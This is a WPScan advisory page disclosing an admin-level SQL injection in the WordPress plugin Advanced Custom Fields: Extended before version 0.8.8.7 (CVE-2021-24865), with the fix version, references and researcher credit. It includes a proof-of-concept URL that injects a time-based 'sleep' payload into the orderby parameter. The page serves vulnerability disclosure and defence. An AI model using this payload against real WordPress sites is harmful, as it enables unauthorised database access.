WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Advanced Custom Fields: Extended < 0.8.8.7 - Admin+ SQL Injection

Description

The plugin does not validate the order and orderby parameters before using them in a SQL statement, leading to a SQL Injection issue

Proof of Concept

https://example.ocm/wp-admin/options-general.php?page=acfe-options&orderby=1%20and%20sleep(0.02)%23

Affects Plugins

acf-extended
Fixed in version 0.8.8.7

References

CVE
CVE-2021-24865
URL
https://plugins.trac.wordpress.org/changeset/2648200

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
055a2dcf-77ec-4e54-be7d-9c47f7730d1b

Timeline

Publicly Published

2021-12-24 (about 1 years ago)

Added

2021-12-24 (about 1 years ago)

Last Updated

2022-09-26 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin